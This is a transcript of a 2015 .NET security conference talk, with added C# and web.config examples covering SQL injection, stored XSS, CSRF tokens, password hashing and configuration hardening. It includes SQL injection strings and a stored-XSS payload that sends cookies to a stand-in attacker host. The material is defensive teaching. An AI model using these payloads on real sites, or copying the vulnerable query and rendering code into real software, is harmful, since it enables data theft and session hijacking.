Top Security Threats for .NET Developers

Posted on 06-Aug-2015


Mikhail Shcherbakov, Product Manager at Cezurity

10th .NET Developers Conference, 19 April 2015, dotnetconf.ru

About me

Product Manager at Cezurity
One of the core developers of the source code analyzer PT Application Inspector
Former Team Lead at Acronis, Luxoft, Boeing, SPC KRUG

Security Development: Where to Begin?


How to write code?

Glossary


Threat - a potential violation of security (ISO 7498-2).

Impact - consequences for an organization or environment when an attack is realized, or weakness is present.

Attack - a well-defined set of actions that, if successful, would result in either damage to an asset, or undesirable operation.


Weakness - a type of mistake in software that, in proper conditions, could contribute to the introduction of vulnerabilities within that software.

Vulnerability - an occurrence of a weakness (or multiple weaknesses) within software, in which the weakness can be used by a party to cause the software to modify or access unintended data, interrupt proper execution, or perform incorrect actions that were not specifically granted to the party who uses the weakness.


Need to Deal with Weaknesses!

Classifications


https://www.owasp.org/index.php/Category:Attack


https://www.owasp.org/index.php/Category:Vulnerability


Create a classification for developers!

Improper Input/Output Handling (Implementation)

Improper Input/Output Handling:
- SQL Injection
- OS Commanding
- XML Injection
- XPath Injection
- XQuery Injection
- LDAP Injection
- Cross-site scripting (XSS)
- Unrestricted File Upload
- Path Traversal
- HTTP Response Splitting
- Content Spoofing
- Buffer Overflow

Injection Anatomy

Input Data (attacker-supplied values; the leading quote closes the string literal the application opened, the rest is parsed as SQL):

' OR 1=1 --

' union all select password FROM CustomerLogin WHERE email = 'x@example.com'--

Injection Anatomy

SQL Injection with EF (Entity Framework)

Show me code!
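The code shown on this slide is not in the transcript. The following is an added example, not the speaker's code: the same SQL injection reproduced with Entity Framework raw SQL. It uses EF Core with an in-memory SQLite database (the talk predates EF Core and used EF6, whose equivalent is Database.SqlQuery) so it runs offline; the CustomerLogin table, the two rows and the attack string are constructed for the demo. It needs the Microsoft.EntityFrameworkCore.Sqlite NuGet package.

```csharp
// Added example (not from the talk): SQL injection through EF Core raw SQL,
// demonstrated against an in-memory SQLite database so it runs offline.
// Requires the NuGet package Microsoft.EntityFrameworkCore.Sqlite (.NET 6+).
using System;
using System.Linq;
using Microsoft.Data.Sqlite;
using Microsoft.EntityFrameworkCore;

public class CustomerLogin
{
    public int Id { get; set; }
    public string Email { get; set; } = "";
    public string Password { get; set; } = ""; // stored in clear only to make the leak obvious
}

public class ShopContext : DbContext
{
    // EF Core maps this DbSet to a table named CustomerLogins.
    public DbSet<CustomerLogin> CustomerLogins => Set<CustomerLogin>();
    public ShopContext(DbContextOptions<ShopContext> options) : base(options) { }
}

public static class Demo
{
    // VULNERABLE: the user-controlled email is concatenated into the SQL text,
    // so a quote in the input changes the structure of the query.
    public static CustomerLogin[] FindVulnerable(ShopContext db, string email)
    {
        string sql = "SELECT * FROM CustomerLogins WHERE Email = '" + email + "'";
        return db.CustomerLogins.FromSqlRaw(sql).ToArray();
    }

    // FIXED: FromSqlInterpolated turns every interpolated value into a DbParameter,
    // so the input is only ever compared as data and never parsed as SQL.
    public static CustomerLogin[] FindSafe(ShopContext db, string email)
    {
        return db.CustomerLogins
                 .FromSqlInterpolated($"SELECT * FROM CustomerLogins WHERE Email = {email}")
                 .ToArray();
    }

    public static void Main()
    {
        // The in-memory SQLite database lives as long as this connection stays open.
        using var conn = new SqliteConnection("DataSource=:memory:");
        conn.Open();
        var options = new DbContextOptionsBuilder<ShopContext>().UseSqlite(conn).Options;
        using var db = new ShopContext(options);
        db.Database.EnsureCreated();

        // Constructed sample rows.
        db.CustomerLogins.AddRange(
            new CustomerLogin { Email = "alice@example.com", Password = "s3cret" },
            new CustomerLogin { Email = "bob@example.com", Password = "hunter2" });
        db.SaveChanges();

        // Constructed attack input from the slide: the quote closes the literal,
        // "OR 1=1" makes the predicate always true, "--" comments out the rest.
        string payload = "' OR 1=1 --";

        Console.WriteLine($"vulnerable: {FindVulnerable(db, payload).Length} rows returned");
        Console.WriteLine($"safe:       {FindSafe(db, payload).Length} rows returned");
    }
}
```

With the payload, the vulnerable query's predicate becomes `Email = '' OR 1=1 --'`, which matches every login and hands the attacker the whole table; the parameterised query looks for a literal address containing the quote character and matches nothing. The same distinction holds in EF6: `Database.SqlQuery<T>(sql, params)` with `{0}` placeholders or SqlParameter objects is parameterised, while concatenating into the query string is not.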

Cross-site scripting (XSS)

Reflected, Stored, DOM-based

Stored XSS

Show me code!
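The stored-XSS code from this slide is not in the transcript. The following is an added example, not the speaker's code: a comment list rendered server-side, once unencoded (what `@Html.Raw(comment)` does in Razor) and once encoded for the HTML body context (what `@comment` does by default). The in-memory list stands in for the database, and the attacker's comment and the `attacker.invalid` host are constructed.

```csharp
// Added example (not from the talk): stored XSS in server-side rendered HTML.
// A comment is persisted once and rendered to every later visitor; if it is
// emitted unencoded, the script it carries runs in each victim's browser.
using System;
using System.Collections.Generic;
using System.Net;
using System.Text;

public static class CommentPage
{
    // Constructed stand-in for persistent storage (the stored half of "stored XSS").
    private static readonly List<string> Store = new();

    public static void PostComment(string body) => Store.Add(body);

    // VULNERABLE: raw concatenation, equivalent to @Html.Raw(comment) in Razor.
    public static string RenderVulnerable()
    {
        var sb = new StringBuilder("<ul>");
        foreach (var c in Store) sb.Append("<li>").Append(c).Append("</li>");
        return sb.Append("</ul>").ToString();
    }

    // FIXED: encode for the HTML body context before emitting. WebUtility.HtmlEncode
    // turns <, >, &, " and ' into entities, so the browser shows the payload as text.
    public static string RenderSafe()
    {
        var sb = new StringBuilder("<ul>");
        foreach (var c in Store) sb.Append("<li>").Append(WebUtility.HtmlEncode(c)).Append("</li>");
        return sb.Append("</ul>").ToString();
    }

    public static void Main()
    {
        PostComment("Nice article!");
        // Constructed attacker comment: stored once, executed for every reader of the page.
        PostComment("<img src=x onerror=\"fetch('https://attacker.invalid/?c='+document.cookie)\">");

        Console.WriteLine(RenderVulnerable());
        Console.WriteLine(RenderSafe());
    }
}
```

Encoding is context-specific: the body-context encoder above is not sufficient inside an unquoted attribute, a `<script>` block or a URL, where the attribute, JavaScript and URL encoders of `System.Text.Encodings.Web` (or AntiXSS in the 2015 time frame) are needed instead.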

DOM-based XSS

Show me code!

Insufficient Control Flow Management (Design/Implementation)

Insufficient Control Flow Management:
- Cross-Site Request Forgery (CSRF)
- Mass Assignment
- Business Logic Errors
- Abuse of Functionality

CSRF

CSRF

ASP.NET MVC: <%= Html.AntiForgeryToken() %>

renders <input name="__RequestVerificationToken" type="hidden" … and sets a matching anti-forgery cookie; the token is only checked on actions marked with [ValidateAntiForgeryToken], so a POST action without the attribute stays forgeable.

ASP.NET Web Forms: __VIEWSTATE, __EVENTVALIDATION. These fields are only a CSRF defence when ViewStateUserKey is set to a per-user value (for example the session id) in Page_Init; otherwise the view state is not bound to a user and an attacker can copy a valid one from his own session.

http://www.jardinesoftware.com/Documents/ASP_Net_Web_Forms_CSRF_Workflow.pdf
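To make concrete what the anti-forgery token above protects against, here is an added example, not the speaker's code and not ASP.NET's own implementation: a minimal synchronizer-token check of the kind Html.AntiForgeryToken() and [ValidateAntiForgeryToken] perform together. One unguessable token per session is kept server-side, emitted into the form, and compared on every state-changing POST. The session id and form fields are constructed stand-ins for the cookie and request body; it targets .NET 6+.

```csharp
// Added example (not from the talk; a simplified synchronizer token, not the
// framework's implementation). A cross-site request carries the victim's session
// cookie, but the attacker's page cannot read the token from the victim's form,
// so the forged POST fails the comparison.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;

public static class AntiForgery
{
    // Server-side token store keyed by session id (constructed; a real app uses session state).
    private static readonly Dictionary<string, byte[]> TokensBySession = new();

    // Called when the form is rendered: returns the hidden input for this session.
    public static string RenderHiddenField(string sessionId)
    {
        if (!TokensBySession.TryGetValue(sessionId, out var token))
        {
            token = RandomNumberGenerator.GetBytes(32); // 256-bit, cryptographically random
            TokensBySession[sessionId] = token;
        }
        var value = Convert.ToBase64String(token);
        return $"<input name=\"__RequestVerificationToken\" type=\"hidden\" value=\"{value}\" />";
    }

    // Called on POST: the session id comes from the cookie, the token from the form body.
    public static bool Validate(string sessionId, IDictionary<string, string> form)
    {
        if (!TokensBySession.TryGetValue(sessionId, out var expected)) return false;
        if (!form.TryGetValue("__RequestVerificationToken", out var submitted)) return false;
        byte[] actual;
        try { actual = Convert.FromBase64String(submitted); }
        catch (FormatException) { return false; }
        // Constant-time comparison so the token cannot be recovered byte by byte.
        return CryptographicOperations.FixedTimeEquals(expected, actual);
    }

    public static void Main()
    {
        const string victimSession = "sess-victim"; // constructed session id

        // Legitimate flow: the page rendered for the victim includes the token,
        // and the victim's browser submits it back with the form.
        var hidden = RenderHiddenField(victimSession);
        var tokenValue = hidden.Split("value=\"")[1].Split('"')[0];
        var legit = new Dictionary<string, string>
        {
            ["__RequestVerificationToken"] = tokenValue,
            ["amount"] = "10"
        };
        Console.WriteLine($"legitimate POST accepted: {Validate(victimSession, legit)}");

        // Forged flow: the attacker's page auto-submits a form to our site. The browser
        // attaches the victim's session cookie, but the attacker never saw the token.
        var forged = new Dictionary<string, string> { ["amount"] = "10000" };
        Console.WriteLine($"forged POST accepted:     {Validate(victimSession, forged)}");
    }
}
```

The framework's token is additionally bound to the logged-in user and to a cookie rather than to server-side state, but the property that matters is the same: the secret must be unreadable from another origin and must be validated on every request that changes state.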

Business Logic Error

Samples

Sensitive Data Exposure (Design/Implementation/Deployment)

Sensitive Data Exposure

- Insufficient Transport Layer Protection
- Insecure Cryptographic Storage
- Insufficient Client-side Data Protection
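The most common instance of Insecure Cryptographic Storage in web applications is password storage, so here is an added example, not the speaker's code: passwords stored with a per-user random salt and a slow key-derivation function, verified in constant time. The algorithm and parameters (PBKDF2-HMAC-SHA256, 32-byte output, 600,000 iterations) and the record format are this example's choices, not the talk's; it targets .NET 6+.

```csharp
// Added example (not from the talk): salted, iterated password hashing with
// PBKDF2 and constant-time verification. Parameters are this example's choices.
using System;
using System.Security.Cryptography;

public static class PasswordHasher
{
    private const int SaltSize = 16;          // 128-bit random salt per password
    private const int HashSize = 32;          // 256-bit derived key
    private const int Iterations = 600_000;   // work factor; raise as hardware gets faster
    private static readonly HashAlgorithmName Prf = HashAlgorithmName.SHA256;

    // Stored format: "pbkdf2-sha256$<iterations>$<salt b64>$<hash b64>", so the
    // parameters travel with the record and can be raised later without a flag day.
    public static string Hash(string password)
    {
        var salt = RandomNumberGenerator.GetBytes(SaltSize);
        var hash = Rfc2898DeriveBytes.Pbkdf2(password, salt, Iterations, Prf, HashSize);
        return $"pbkdf2-sha256${Iterations}${Convert.ToBase64String(salt)}${Convert.ToBase64String(hash)}";
    }

    public static bool Verify(string password, string stored)
    {
        var parts = stored.Split('$');
        if (parts.Length != 4 || parts[0] != "pbkdf2-sha256") return false;
        if (!int.TryParse(parts[1], out var iterations) || iterations < 1) return false;
        byte[] salt, expected;
        try
        {
            salt = Convert.FromBase64String(parts[2]);
            expected = Convert.FromBase64String(parts[3]);
        }
        catch (FormatException) { return false; }

        var actual = Rfc2898DeriveBytes.Pbkdf2(password, salt, iterations, Prf, expected.Length);
        // Constant-time compare: a plain == would leak how many leading bytes match.
        return CryptographicOperations.FixedTimeEquals(expected, actual);
    }

    public static void Main()
    {
        var record = Hash("correct horse battery staple");   // constructed password
        Console.WriteLine(record);
        Console.WriteLine(Verify("correct horse battery staple", record));
        Console.WriteLine(Verify("Tr0ub4dor&3", record));
        // Two hashes of the same password differ because the salt differs, so a
        // leaked table cannot be attacked with one precomputed list for all users.
        Console.WriteLine(Hash("correct horse battery staple") != record);
    }
}
```

Unsalted MD5 or SHA-1, a single application-wide salt, or a reversible encryption of the password are the patterns this replaces; the other two items in the list (transport protection, client-side data) are deployment and design concerns rather than code.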

Improper Access Control (Design/Implementation/Deployment)

Improper Access Control

- Insufficient Authentication
- Insufficient Authorization
- Insufficient Password Recovery
- Insufficient Session Expiration
- Credential/Session Prediction
- Improper File System Permissions
- Brute Force
- Insufficient Anti-automation

Security Misconfiguration (Deployment)


- Application Misconfiguration
- Server Misconfiguration
- Information Exposure Through an Error Message
- Information Leakage
- Directory Indexing
- Insecure Indexing
- Using Components with Known Vulnerabilities
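The settings behind several of these items live in web.config. The following is an added example, not from the talk: the weak values that expose stack traces, version headers and directory listings, commented out beside the hardened ones. The error page path `~/Error` is a placeholder.

```xml
<!-- Added example (not from the talk): ASP.NET web.config, weak settings beside hardened ones -->
<configuration>
  <system.web>
    <!-- Weak: full stack traces and source lines go to every client
         (Information Exposure Through an Error Message)
    <customErrors mode="Off" />
    <compilation debug="true" />
    -->

    <!-- Hardened: generic error page for remote users, no debug symbols in the build -->
    <customErrors mode="RemoteOnly" defaultRedirect="~/Error" />
    <compilation debug="false" />

    <!-- Do not advertise the ASP.NET version (Information Leakage) -->
    <httpRuntime enableVersionHeader="false" />

    <!-- Session and forms-auth cookies: unreadable from script, never sent in clear -->
    <httpCookies httpOnlyCookies="true" requireSSL="true" />
  </system.web>

  <system.webServer>
    <!-- Directory Indexing: never list folder contents -->
    <directoryBrowse enabled="false" />

    <!-- Drop the X-Powered-By header IIS adds by default -->
    <httpProtocol>
      <customHeaders>
        <remove name="X-Powered-By" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>
```

"Using Components with Known Vulnerabilities" is not a config setting: it is handled by tracking the versions of NuGet packages and the framework itself against published advisories and updating them.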

Summary

OWASP Top Ten Project (2010/2013): http://bit.ly/1OffewO
OWASP .NET Project: http://bit.ly/1cz62Sv
Vladimir Kochetkov Blog: http://bit.ly/1DecXWI
Troy Hunt Blog: www.troyhunt.com
OWASP Developer Guide: http://bit.ly/1JcQLoh
CWE/SANS Top 25 Most Dangerous Software Errors (2011): http://bit.ly/1bjDTOH

Thank you for your attention!

Mikhail Shcherbakov

ms@cezurity.com

linkedin.com/in/mikhailshcherbakov

github.com/yuske

@yu5k3

Product Manager at Cezurity